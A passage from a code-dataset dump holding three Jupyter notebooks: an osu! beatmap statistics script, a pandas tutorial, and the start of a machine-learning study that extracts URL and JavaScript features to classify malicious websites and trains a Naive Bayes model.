"clean data....\n"
],
[
"# API找出麻婆國籍 並統一使用者名稱\ndef get_country_username(creator_id):\n try:\n q = requests.get('https://osu.ppy.sh/api/get_user?k=*************************&u='+creator_id).json()[0]\n q_country = q.get('country')\n q_username = q.get('username') \n return [q_country, q_username]\n except:\n return [np.nan, np.nan]\n\n\nprint('add country and username ....')\ndf_country = df_rank_mapset_overview[['creator_id']].drop_duplicates('creator_id', keep='first')\ncreator_id_list = df_country.creator_id.to_list()\ncountry_username_list = []\nfor creator_id in tqdm(creator_id_list):\n country_username_list.append( get_country_username(creator_id) )\n\n\ndf_country_username = pd.DataFrame(country_username_list, columns=['country','mapper'])\ndf_country = df_country.reset_index( drop=True) \ndf_country = pd.concat([df_country, df_country_username], axis=1)\n\ndf_rank_mapset_overview = pd.merge(df_rank_mapset_overview, df_country, how='left' ,on='creator_id')",
"_____no_output_____"
]
],
[
[
"### Done",
"_____no_output_____"
]
],
[
[
"# 欄位名稱取名\ndf_rank_mapset_overview = df_rank_mapset_overview.rename(columns={'beatmap_id': 'beatmap_count',\n 'genre_id':'genre',\n 'language_id':'language',\n 'title_unicode':'title', \n 'artist_unicode':'artist',\n 'creator_id':'mapper_id'\n }) \n# 縮圖網址\n#df_rank_mapset_overview['beatmap_thumbnail'] = df_rank_mapset_overview['beatmapset_id'].apply(lambda x: 'https://b.ppy.sh/thumb/'+str(x)+'l.jpg') \n#df_rank_mapset_overview['mapper_thumbnail'] = df_rank_mapset_overview['mapper_id'].apply(lambda x: 'http://s.ppy.sh/a/'+str(x))\n\ndf_rank_mapset_overview = df_rank_mapset_overview[['beatmapset_id','beatmap_count','title','artist',\n 'mapper','mapper_id','approved_date','favourite_count','playcount',\n 'genre','language','country','status']] #'beatmap_thumbnail','mapper_thumbnail',\ndf_rank_mapset_overview",
"_____no_output_____"
],
[
"df_rank_mapset_overview.to_csv('Mapping_Overview_20210218.csv', index=False, encoding='utf_8_sig')",
"_____no_output_____"
]
],
[
[
"### 其他統計",
"_____no_output_____"
]
],
[
[
"df_other = df_rank_map[['beatmapset_id','beatmap_id','status','title_unicode','artist_unicode','version','creator_id','creator','hit_length','bpm','storyboard','diff_size','count_normal','count_slider','count_spinner']]\ndf_other = df_other.astype({'bpm':'float64','hit_length':'int64','storyboard':'int64','diff_size':'float64','count_normal':'int64','count_slider':'int64','count_spinner':'int64'})\ndf_other['max_combo'] = df_other['count_normal']+df_other['count_slider']+df_other['count_spinner']\ndf_other['total_length_class'] = df_other['hit_length'].apply(lambda x:'< 1:39' if x<99 else(\n '1:39 ~ 3:29' if x>=99 and x<209 else(\n '3:29 ~ 5:00' if x>=209 and x<300 else '> 5:00')))\ndf_other['total_length'] = df_other['hit_length'].apply(lambda x: \"%02d:%02d\" % (divmod(x, 60)[0], divmod(x, 60)[1]))",
"_____no_output_____"
],
[
"df_other_mapset = df_other.groupby('beatmapset_id').agg({'beatmap_id':'count',\n 'status':'max',\n 'title_unicode':'max',\n 'artist_unicode':'max',\n 'creator_id':'max',\n 'creator':'max',\n 'bpm':'max',\n 'storyboard':'max',\n 'count_normal':'sum',\n 'count_slider':'sum',\n 'count_spinner':'sum',\n 'total_length_class':'max',\n 'total_length':'max'}).reset_index(drop=False)\ndf_other_mapset",
"_____no_output_____"
],
[
"# CS10\ndf_other.loc[df_other.diff_size==10][['beatmapset_id','beatmap_id','title_unicode','artist_unicode','version','creator_id','creator']]",
"_____no_output_____"
],
[
"# BPM\ndf_other.sort_values(by='bpm', ascending=False).head(1)[['beatmapset_id','title_unicode','artist_unicode','creator_id','creator','bpm']]",
"_____no_output_____"
],
[
"# max_combo\ndf_other.sort_values(by='max_combo', ascending=False).head(1)[['beatmapset_id','beatmap_id','title_unicode','artist_unicode','version','creator_id','creator','total_length_class','hit_length','max_combo']]",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
e70897e6d10a1dddacad33e1ee05864fb94163a0 | 85,377 | ipynb | Jupyter Notebook | Lecture/.ipynb_checkpoints/6. Pandas 02-checkpoint.ipynb | saeed-saffari/UT-workshop-sum2021 | 8956fa6bc8df00cb542b550124d437dbea3df799 | [
"MIT"
] | 1 | 2021-09-17T08:25:53.000Z | 2021-09-17T08:25:53.000Z | Lecture/6. Pandas 02.ipynb | saeed-saffari/UT-workshop-sum2021 | 8956fa6bc8df00cb542b550124d437dbea3df799 | [
"MIT"
] | null | null | null | Lecture/6. Pandas 02.ipynb | saeed-saffari/UT-workshop-sum2021 | 8956fa6bc8df00cb542b550124d437dbea3df799 | [
"MIT"
] | 4 | 2021-09-16T20:10:14.000Z | 2022-02-09T07:27:59.000Z | 25.918944 | 122 | 0.3078 | [
[
[
"# <center> Pandas 02 <center>",
"_____no_output_____"
],
[
"<img src = 'https://github.com/saeed-saffari/alzahra-workshop-spr2021/blob/main/lecture/PIC/Pandas.png?raw=true' \n width = \"550\"\n >",
"_____no_output_____"
],
[
"## Imports",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd",
"_____no_output_____"
]
],
[
[
"## Na, NAN",
"_____no_output_____"
]
],
[
[
"df = pd.DataFrame({\n 'col1':[1,2,3,4,np.nan],\n 'col2':[np.nan,555,np.nan,444, 333],\n 'col3':['abc', 'def', 'ghi', 'xyz', 'ghj'],\n 'col4':['16', '23', '18', '25', '27'],\n 'col5':['187', '160', np.nan, '202', '163']\n})\ndf",
"_____no_output_____"
],
[
"df.isnull()",
"_____no_output_____"
],
[
"df.dropna()",
"_____no_output_____"
],
[
"df",
"_____no_output_____"
],
[
"df.fillna(120)",
"_____no_output_____"
],
[
"df.fillna('missing')",
"_____no_output_____"
],
[
"df.fillna(method= 'ffill')",
"_____no_output_____"
],
[
"df.fillna(method= 'ffill').dropna()",
"_____no_output_____"
],
[
"df.fillna(method= 'bfill')",
"_____no_output_____"
],
[
"df.interpolate()",
"_____no_output_____"
],
[
"df[['col4', 'col5']] = df[['col4', 'col5']].astype(float)",
"_____no_output_____"
],
[
"df",
"_____no_output_____"
],
[
"df.interpolate()",
"_____no_output_____"
]
],
[
[
"## Concat",
"_____no_output_____"
]
],
[
[
"df1 = pd.DataFrame({\n 'A': ['A0', 'A1', 'A2', 'A3'],\n 'B': ['B0', 'B1', 'B2', 'B3'],\n 'C': ['C0', 'C1', 'C2', 'C3'],\n 'D': ['D0', 'D1', 'D2', 'D3']},\n index=[0, 1, 2, 3])\n\ndf2 = pd.DataFrame({\n 'A': ['A4', 'A5', 'A6', 'A7'],\n 'B': ['B4', 'B5', 'B6', 'B7'],\n 'C': ['C4', 'C5', 'C6', 'C7'],\n 'D': ['D4', 'D5', 'D6', 'D7']},\n index=[4, 5, 6, 7])",
"_____no_output_____"
],
[
"df1",
"_____no_output_____"
],
[
"df2",
"_____no_output_____"
],
[
"pd.concat([df1, df2], axis = 0)",
"_____no_output_____"
],
[
"pd.concat([df1, df2], axis = 1)",
"_____no_output_____"
],
[
"df3 = pd.DataFrame({\n 'E': ['E0', 'E1', 'E2', 'E3'],\n 'F': ['F0', 'F1', 'F2', 'F3'],\n 'G': ['G0', 'G1', 'G2', 'G3'],\n 'H': ['H0', 'H1', 'H2', 'H3']},\n index=[0, 1, 2, 3])\ndf3",
"_____no_output_____"
],
[
"pd.concat([df1, df3], axis = 1)",
"_____no_output_____"
]
],
[
[
"## Merge",
"_____no_output_____"
]
],
[
[
"left = pd.DataFrame({\n 'key': ['k0', 'k1', 'k2', 'k3'],\n 'A' : ['A0', 'A1', 'A2', 'A3'],\n 'B' : ['B0', 'B1', 'B2', 'B3']})\n\nright = pd.DataFrame({\n 'key': ['k0', 'k1', 'k2', 'k4'],\n 'C' : ['C0', 'C1', 'C2', 'C4'],\n 'D' : ['D0', 'D1', 'D2', 'D4']})",
"_____no_output_____"
],
[
"left",
"_____no_output_____"
],
[
"right",
"_____no_output_____"
],
[
"pd.merge(left, right, how = 'inner', on = 'key')",
"_____no_output_____"
],
[
"pd.merge(left, right, how = 'outer', on = 'key')",
"_____no_output_____"
],
[
"pd.merge(left, right, how = 'right', on = 'key')",
"_____no_output_____"
],
[
"pd.merge(left, right, how = 'left', on = 'key')",
"_____no_output_____"
]
],
[
[
"## Group by",
"_____no_output_____"
]
],
[
[
"data = {\n 'Company': ['GOOG', 'GOOG','GOOG', 'MSFT', 'MSFT', 'FB', 'FB'],\n 'Person' : ['Sam', 'Charlie', 'John', 'Amy', 'Vanessa', 'Carl', 'Sarah'],\n 'Sales' : [200, 120, 236, 340, 124, 243, 350]\n}",
"_____no_output_____"
],
[
"df = pd.DataFrame(data)\ndf",
"_____no_output_____"
],
[
"by_comp = df.groupby('Company')",
"_____no_output_____"
],
[
"by_comp",
"_____no_output_____"
],
[
"by_comp.mean()",
"_____no_output_____"
],
[
"by_comp.std()",
"_____no_output_____"
],
[
"by_comp.mean()",
"_____no_output_____"
],
[
"by_comp.max()",
"_____no_output_____"
],
[
"by_comp.count()",
"_____no_output_____"
],
[
"by_comp.describe()",
"_____no_output_____"
],
[
"by_comp.describe().columns",
"_____no_output_____"
],
[
"by_comp.describe()['Sales']",
"_____no_output_____"
],
[
"by_comp.describe()['Sales']['max']",
"_____no_output_____"
],
[
"x = by_comp.describe()['Sales'][['max', 'min']]\nx",
"_____no_output_____"
],
[
"x['diffrence'] = x['max'] - x['min']\nx",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7089d0d9044ac367763f3a1a28e4db16b0d1a13 | 512,346 | ipynb | Jupyter Notebook | Dataset_20_phase_2_ML.ipynb | AhmadChaiban/Malicious-Website-Feature-Study | 3e2aafc0d17ea36371dd561d1cb3503eaae7495a | [
"Apache-2.0"
] | 1 | 2022-03-20T05:29:34.000Z | 2022-03-20T05:29:34.000Z | Dataset_20_phase_2_ML.ipynb | AhmadChaiban/Malicious-Website-Feature-Study | 3e2aafc0d17ea36371dd561d1cb3503eaae7495a | [
"Apache-2.0"
] | 1 | 2022-03-16T11:05:27.000Z | 2022-03-16T11:05:27.000Z | Dataset_20_phase_2_ML.ipynb | AhmadChaiban/Malicious-Website-Feature-Study | 3e2aafc0d17ea36371dd561d1cb3503eaae7495a | [
"Apache-2.0"
] | null | null | null | 117.375945 | 109,752 | 0.845718 | [
[
[
"# Dataset 20 Phase 2 Machine Learning Notebook",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport re\nimport codecs\n\nfrom glob import glob as globlin\n\nfrom tqdm import tqdm\nfrom tqdm import tqdm_notebook\n\nfrom xgboost import XGBClassifier\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import svm\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score\nfrom sklearn.svm import libsvm\n\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom plotly.offline import plot, iplot\nimport plotly.express as px\n\nfrom bs4 import BeautifulSoup\n\nfrom simpletransformers.classification import ClassificationModel, ClassificationArgs\n\nlibsvm.set_verbosity_wrap(1)\ntqdm.pandas()\n\n## For debugging \n\nimport signal\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef timeout(time):\n # Register a function to raise a TimeoutError on the signal.\n signal.signal(signal.SIGALRM, raise_timeout)\n # Schedule the signal to be sent after ``time``.\n signal.alarm(time)\n\n try:\n yield\n except TimeoutError:\n return 'timeout error'\n finally:\n # Unregister the signal so it won't be triggered\n # if the timeout is not reached.\n signal.signal(signal.SIGALRM, signal.SIG_IGN)\n\n\ndef raise_timeout(signum, frame):\n raise TimeoutError",
"/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/sklearn/utils/deprecation.py:143: FutureWarning: The sklearn.svm.libsvm module is deprecated in version 0.22 and will be removed in version 0.24. The corresponding classes / functions should instead be imported from sklearn.svm. Anything that cannot be imported from sklearn.svm is now part of the private API.\n warnings.warn(message, FutureWarning)\n"
],
[
"dataset_benign = pd.read_csv('./')",
"_____no_output_____"
],
[
"dataset_20 = pd.read_csv('dataset_20_new_features.csv').drop(columns = ['Unnamed: 0'])\ndataset_20.head(1)",
"_____no_output_____"
]
],
[
[
"## Additional malicious Data",
"_____no_output_____"
]
],
[
[
"dataset_https = pd.read_csv('./addon_features/final_malicious_features_https.csv')\ndataset_https['https'].value_counts()",
"_____no_output_____"
],
[
"dataset_tld_urllen = pd.read_csv('./addon_features/final_malicious_features_tld_urllen.csv')\ndataset_tld_urllen['tld'].value_counts()",
"_____no_output_____"
],
[
"plt.figure(figsize=(35,10))\nplt.hist(dataset_tld_urllen['tld'], bins=341)\nplt.xticks(rotation=90)\nplt.show()",
"_____no_output_____"
],
[
"dataset_content = pd.read_csv('./addon_features/final_malicious_content.csv')\nlen(dataset_content[dataset_content['content'] == 'could not fetch content'])",
"_____no_output_____"
],
[
"dataset_whois = pd.read_csv('./addon_features/final_malicious_whois.csv')\ndataset_whois['who_is'].value_counts()",
"_____no_output_____"
],
[
"dataset_supp = pd.concat([\n dataset_tld_urllen, dataset_https['https'], dataset_whois['who_is'],\n dataset_content['content']\n],\n axis=1).drop(columns=['Unnamed: 0'])",
"_____no_output_____"
],
[
"dataset_supp['URL']",
"_____no_output_____"
]
],
[
[
"### Saving HTML files for supplementary data for deobfuscation",
"_____no_output_____"
]
],
[
[
"# def save_content_as_html(content, counter):\n# with open(f'./deobfuscation/html_obf2/{counter}.html', 'w') as f:\n# f.write(str(content))\n\n \n# html_capture = dataset_supp.nlargest(100, 'js_len').progress_apply(\n# lambda row: save_content_as_html(row['content'], row.name), axis=1)",
"_____no_output_____"
]
],
[
[
"### Getting deobfuscated content",
"_____no_output_____"
]
],
[
[
"paths = globlin('./deobfuscation/html_deobf/*.html')\nfor path in tqdm(paths):\n index_ = int(path.split('/')[-1].replace('.html', ''))\n with open(f'./deobfuscation/html_deobf/{index_}.html', 'r') as f:\n dataset_supp['content'].iloc[index_] = f.read()",
" 0%| | 0/901 [00:00<?, ?it/s]/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/pandas/core/indexing.py:205: SettingWithCopyWarning:\n\n\nA value is trying to be set on a copy of a slice from a DataFrame\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n\n100%|██████████| 901/901 [00:03<00:00, 296.04it/s]\n"
]
],
[
[
"### Get Javascript Length",
"_____no_output_____"
]
],
[
[
"## generic js\ntags_of_interest = ['<script type=\"text/javascript\">', '<script>']\n\ngeneric_js = []\n\nsoup = BeautifulSoup(dataset_supp['content'].iloc[13000], 'html.parser')\njs = soup.find_all('script')\ngeneric_js.append(str(js[0]))\ngeneric_js.append(str(js[1]))\n\nsoup = BeautifulSoup(dataset_supp['content'].iloc[14958], 'html.parser')\njs = soup.find_all('script')\ngeneric_js.append(str(js[0]))\ngeneric_js.append(str(js[2]))\n\ngeneric_js.append('function_to_hack')\n\n# complete_js = ''\n# for tag in js:\n# for tag_int in tags_of_interest:\n# if tag_int in str(tag):\n# print(tag)\n# break",
"_____no_output_____"
],
[
"def get_js_length(content, supp=False):\n concat_js = ''\n # ('97)?\\s*(.*)<\\s*script[^>]>\\s*(.*)(<\\s*/\\s*script\\s*>)?\n if not supp:\n regex_ = r\"('97)?\\s*(.*)(<\\s*script[^>]>)?\\s*(.*)(<\\s*/\\s*script\\s*>)?\"\n js = re.findall(regex_, content, flags=(re.DOTALL | re.IGNORECASE))\n try:\n for tuple_element in js[0]:\n concat_js = tuple_element + concat_js\n complete_js = ''.join(concat_js)\n return len(complete_js.encode('utf-8')) / 10\n except:\n complete_js = ''.join(js)\n return len(complete_js.encode('utf-8')) / 10\n else:\n soup = BeautifulSoup(content, 'html.parser')\n js = soup.find_all('script')\n complete_js = ''\n for tag in js:\n for tag_int in tags_of_interest:\n if tag_int in str(tag) and all(g_js not in str(tag)\n for g_js in generic_js):\n complete_js += str(tag).replace(tag_int, '').replace(\n '</script>', '')\n return len(complete_js.encode('utf-8')) / 10\n\n\ndataset_supp['js_len'] = dataset_supp['content'].progress_apply(\n lambda content: get_js_length(str(content), True))\ndataset_20['js_len'] = dataset_20['content'].progress_apply(\n lambda content: get_js_length(str(content)))",
" 19%|█▊ | 3107/16740 [01:00<02:44, 83.04it/s] /Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/bs4/__init__.py:314: UserWarning:\n\n\"b'.'\" looks like a filename, not markup. You should probably open this file and pass the filehandle into Beautiful Soup.\n\n100%|██████████| 16740/16740 [03:06<00:00, 89.89it/s] \n100%|██████████| 1313575/1313575 [00:38<00:00, 34067.99it/s]\n"
],
[
"dataset_20.nlargest(900, 'js_len')['js_len']",
"_____no_output_____"
],
[
"dataset_supp.nlargest(100, 'js_len')['js_len']",
"_____no_output_____"
]
],
[
[
"### Dropping 100 largest (outliers)",
"_____no_output_____"
]
],
[
[
"dataset_supp = dataset_supp.drop(dataset_supp.nlargest(100, 'js_len').index, axis='index')",
"_____no_output_____"
],
[
"# soup = BeautifulSoup(x, 'html.parser')\n# js = soup.find_all('script')\n# complete_js = ''\n# for tag in js:\n# for tag_int in tags_of_interest:\n# if tag_int in str(tag) and all(g_js not in str(tag) for g_js in generic_js):\n# complete_js += str(tag).replace(tag_int, '').replace('</script>', '')",
"_____no_output_____"
],
[
"# complete_js",
"_____no_output_____"
],
[
"# len(complete_js)",
"_____no_output_____"
],
[
"# <script type=\"text/javascript\">\n# <script>",
"_____no_output_____"
],
[
"# to_check = dataset_20[dataset_20['label']=='good'].iloc[0]['content']\n# print(get_js_length(to_check))\n# print(to_check)",
"_____no_output_____"
],
[
"# dataset_20['js_len_2'] = dataset_20['content'].progress_apply(lambda content: get_js_length(str(content)))",
"_____no_output_____"
],
[
"# dataset_20['js_len_2']",
"_____no_output_____"
],
[
"# dataset_20['js_len']",
"_____no_output_____"
]
],
[
[
"### Number function calls in JS ",
"_____no_output_____"
]
],
[
[
"dataset_supp['num_js_func_calls'] = dataset_supp['content'].progress_apply(\n lambda x: len(str(x).split('()')))\ndataset_20['num_js_func_calls'] = dataset_20['content'].progress_apply(\n lambda x: len(str(x).split('()')))",
"100%|██████████| 16640/16640 [00:00<00:00, 28027.38it/s]\n100%|██████████| 1313575/1313575 [00:06<00:00, 190270.64it/s]\n"
],
[
"dataset_20.columns",
"_____no_output_____"
],
[
"dataset_supp.columns",
"_____no_output_____"
],
[
"dataset_supp.columns = [\n 'url', 'label', 'has_IP_in_URL', 'number_subdomains', 'hostname',\n 'length_hostname', 'ratio_digits_url', 'having_@_in_url',\n 'ratio_digits_hostname', 'number_underscores', 'tld', 'url_len', 'https',\n 'who_is', 'content', 'js_len', 'num_js_func_calls'\n]",
"_____no_output_____"
],
[
"dataset_supp['label'] = 'bad'",
"_____no_output_____"
]
],
[
[
"### Encoding supplemental data",
"_____no_output_____"
]
],
[
[
"def column_adjustor(dataset_column):\n unique_values = dataset_column.unique()\n return dataset_column.progress_apply(lambda x: np.where(unique_values == x)[0][0])",
"_____no_output_____"
],
[
"dataset_supp['who_is'] = column_adjustor(dataset_supp['who_is'])\ndataset_supp['https'] = column_adjustor(dataset_supp['https'])\ndataset_supp['tld'] = column_adjustor(dataset_supp['tld'])",
"100%|██████████| 16640/16640 [00:00<00:00, 168509.39it/s]\n100%|██████████| 16640/16640 [00:00<00:00, 180154.77it/s]\n100%|██████████| 16640/16640 [00:00<00:00, 98426.60it/s]\n"
],
[
"dataset_20 = dataset_20.drop(columns=['latitude', 'longitude'])",
"_____no_output_____"
],
[
"dataset_20_supp = pd.concat([dataset_20, dataset_supp], axis=0)",
"/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:1: FutureWarning:\n\nSorting because non-concatenation axis is not aligned. A future version\nof pandas will change to not sort by default.\n\nTo accept the future behavior, pass 'sort=False'.\n\nTo retain the current behavior and silence the warning, pass 'sort=True'.\n\n\n"
],
[
"dataset_20_supp.head(1)",
"_____no_output_____"
],
[
"dataset_20_supp['content'] = dataset_20_supp['content'].fillna('could not fetch content')",
"_____no_output_____"
]
],
[
[
"### Get Malicious JS function count",
"_____no_output_____"
]
],
[
[
"def get_malicious_js_function_count(content):\n function_list = [\n 'setcookie', 'getcookie', 'createxmlhttprequest', 'unescape',\n 'document.write', 'element.appendchild', 'dateobject.togmtstring',\n 'new activexobject', 'document.createelement', 'getappname',\n 'getuseragent', 'window.setinterval', 'window.settimeout',\n 'location.assign', 'location.replace', 'eval()', 'string.indexof',\n 'string.fromcharcode', 'string.charat', 'string.split',\n 'string.charcodeat', 'document.writeln', 'document.appendchild',\n 'element.innerhtml'\n ]\n\n split_content = content.split(' ')\n counter = 0\n for element in split_content:\n if any(m_function in element.lower() for m_function in function_list):\n counter += 1\n\n return counter",
"_____no_output_____"
],
[
"dataset_20_supp['malicious_func_count'] = dataset_20_supp['content']\\\n.progress_apply(lambda content: get_malicious_js_function_count(content))",
"100%|██████████| 1330215/1330215 [15:08<00:00, 1463.80it/s]\n"
]
],
[
[
"### Get total and external URL count in content",
"_____no_output_____"
]
],
[
[
"def find_urls(string, ext_count):\n with timeout(1):\n regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n url = re.findall(regex, string)\n if ext_count:\n return len(set(url))\n return len(url)\n\n\n# Test Code\nstring = 'My Profile: https://auth.geeksforgeeks.org/user/Chinmoy%20Lenka/articles in the portal of http://www.geeksforgeeks.org/'\nprint(\"Urls: \", find_urls(string, False))\nprint(find_urls(dataset_20_supp['content'].iloc[-2000], False))",
"Urls: 2\n43\n"
],
[
"dataset_20_supp['total_url_count'] = dataset_20_supp['content'].progress_apply(\n lambda content: find_urls(str(content), False)\n)",
"100%|██████████| 1330215/1330215 [04:32<00:00, 4886.73it/s] \n"
],
[
"dataset_20_supp['ext_url_count'] = dataset_20_supp['content'].progress_apply(\n lambda content: find_urls(str(content), True)\n)",
"100%|██████████| 1330215/1330215 [04:40<00:00, 4735.37it/s] \n"
]
],
[
[
"## Dataset Sample",
"_____no_output_____"
]
],
[
[
"good_samples = dataset_20_supp[dataset_20_supp['label'] == 'good'].sample(46418, random_state=41)\nbad_samples = dataset_20_supp[dataset_20_supp['label'] == 'bad'].sample(46418, random_state=41)\n\ndataset_20_sample = pd.concat([good_samples, bad_samples], axis=0)",
"_____no_output_____"
]
],
[
[
"## Checkpoint 1: Preprocessed supplemented dataset",
"_____no_output_____"
]
],
[
[
"# dataset_20_supp.to_csv('supplemented_dataset_20.csv', index=False)\n# dataset_20_sample.to_csv('supplemented_dataset_20_training_sample.csv', index=False)",
"_____no_output_____"
],
[
"dataset_20_supp = pd.read_csv('datasets_of_interest/supplemented_dataset_20.csv')\ndataset_20_sample = pd.read_csv('./datasets_of_interest/supplemented_dataset_20_training_sample.csv')",
"_____no_output_____"
],
[
"dataset_20_supp.columns",
"_____no_output_____"
],
[
"dataset_20_sample['label'].value_counts()",
"_____no_output_____"
]
],
[
[
"## Normalizing ",
"_____no_output_____"
]
],
[
[
"from sklearn import preprocessing\nto_keep = dataset_20_supp.drop(\n columns=['url', 'ip_add', 'content', 'hostname', 'js_obf_len', 'label']).columns[::-1]\n\nx = dataset_20_supp[dataset_20_supp['label'] == 'bad'][to_keep].copy() #returns a numpy array\nmin_max_scaler = preprocessing.MinMaxScaler()\nx_scaled = min_max_scaler.fit_transform(x.values)\ndf_to_plot_malicious = pd.DataFrame(x_scaled)\ndf_to_plot_malicious.columns = dataset_20_supp[to_keep].columns\ndf_to_plot_malicious['label'] = 1.0\n\nx = dataset_20_supp[dataset_20_supp['label'] == 'good'][to_keep].copy() #returns a numpy array\nmin_max_scaler = preprocessing.MinMaxScaler()\nx_scaled = min_max_scaler.fit_transform(x.values)\ndf_to_plot_benign = pd.DataFrame(x_scaled)\ndf_to_plot_benign.columns = dataset_20_supp[to_keep].columns\ndf_to_plot_benign['label'] = 0.0\n\ndf_to_plot = pd.concat([df_to_plot_malicious, df_to_plot_benign], axis=0)",
"_____no_output_____"
],
[
"df_to_plot['label'].value_counts()",
"_____no_output_____"
],
[
"dataset_20_supp['content'][1]",
"_____no_output_____"
]
],
[
[
"## Feature analysis",
"_____no_output_____"
]
],
[
[
"features = dataset_20_supp.drop(columns=['url', 'label', 'ip_add', 'content', \n 'hostname', 'js_obf_len']).columns[::-1]\nlen(features)",
"_____no_output_____"
],
[
"features = dataset_20_supp.drop(columns=['url', 'label', 'ip_add', 'content', \n 'hostname', 'js_obf_len']).columns[::-1]\n#df_to_plot = dataset_20_supp\n\nn_bins = 40\n\nfig, axs = plt.subplots(4, 4, figsize=(20,20))\n\n# We can set the number of bins with the `bins` kwarg\nfeature_counter = 0\nfor i in range(len(axs)):\n for j in range(len(axs[i])): \n current_feature = df_to_plot[features[feature_counter]]\n axs[i, j].hist(current_feature[df_to_plot['label']==0.0], n_bins, fc=(0, 1, 0, 0.5))\n axs[i, j].hist(current_feature[df_to_plot['label']==1.0], n_bins, fc=(1, 0, 0, 0.5))\n axs[i, j].set_title(f'Feature: {features[feature_counter]}')\n if features[feature_counter] == 'js_len':\n axs[i, j].set_ylim([0, current_feature.value_counts().iloc[0]]) \n else:\n axs[i, j].set_ylim([0, max(current_feature.value_counts())]) \n feature_counter += 1\n if feature_counter > 14:\n break\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Plotly analysis",
"_____no_output_____"
]
],
[
[
"dataset_20_sample.columns",
"_____no_output_____"
],
[
"feature = 'malicious_func_count'\ndataset_to_plot = dataset_20_sample\n\ngood_filter = dataset_to_plot[feature][dataset_to_plot['label'] == 'good']#.progress_apply(lambda x: roundup(x))\nbad_filter = dataset_to_plot[feature][dataset_to_plot['label'] == 'bad']#.progress_apply(lambda x: roundup(x))\n\n\n# bad_filter = bad_filter[bad_filter!=bad_filter.max()]\n\ntrace1 = go.Histogram(\n x=good_filter,\n name='Benign',\n yaxis='y2'\n\n)\n\ntrace2 = go.Histogram(\n x=bad_filter,\n name='Malicious',\n yaxis='y2'\n)\n\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\nfig.add_trace(trace1)\nfig.add_trace(trace2,secondary_y=True)\n\nfig['layout'].update(height = 500, width = 800, title = f'Feature: {feature}',xaxis=dict(tickangle=-90))\niplot(fig)",
"_____no_output_____"
]
],
[
[
"## Train-test-split",
"_____no_output_____"
]
],
[
[
"X = dataset_20_sample.drop(columns = ['label'])\ny = np.array(dataset_20_sample['label'].apply(lambda x: 1 if 'bad' in x else 0))",
"_____no_output_____"
],
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)",
"_____no_output_____"
],
[
"original_features = ['url', 'url_len', 'ip_add', 'js_len',\n 'tld', 'who_is', 'https', 'content']\n\nto_drop = ['url', 'content', 'ip_add', 'hostname', 'js_obf_len', 'total_url_count', 'ext_url_count']\n\n## Variation 1\nX_train_original_features = np.array(X_train[original_features].drop(columns=['url', 'content', 'ip_add']))\nX_test_original_features = np.array(X_test[original_features].drop(columns=['url', 'content', 'ip_add']))\n\n## Variation 2\nX_train_original_features_remove_js = np.array(X_train[original_features]\\\n.drop(columns=['js_len'])\\\n.drop(columns=['url', 'content', 'ip_add']))\n\nX_test_original_features_remove_js = np.array(X_test[original_features]\\\n.drop(columns=['js_len'])\\\n.drop(columns=['url', 'content', 'ip_add']))\n\n## Variation 3\nX_train_custom_features = np.array(X_train.drop(columns=to_drop))\nX_test_custom_features = np.array(X_test.drop(columns=to_drop))\n\n## Variation 4\nX_train_custom_features_without_js = np.array(X_train.drop(columns = ['malicious_func_count', \n 'num_js_func_calls', 'js_len'])\\\n .drop(columns=to_drop))\nX_test_custom_features_without_js = np.array(X_test.drop(columns = ['malicious_func_count', \n 'num_js_func_calls', 'js_len'])\\\n .drop(columns=to_drop))\n\n## Variation 5\nX_train_transformer = X_train['url']\nX_test_transformer = X_test['url']",
"_____no_output_____"
]
],
[
[
"## Naive Bayes",
"_____no_output_____"
],
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"gnb = GaussianNB()\ngnb.fit(X_train_original_features, y_train)",
"_____no_output_____"
],
[
"y_pred = gnb.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
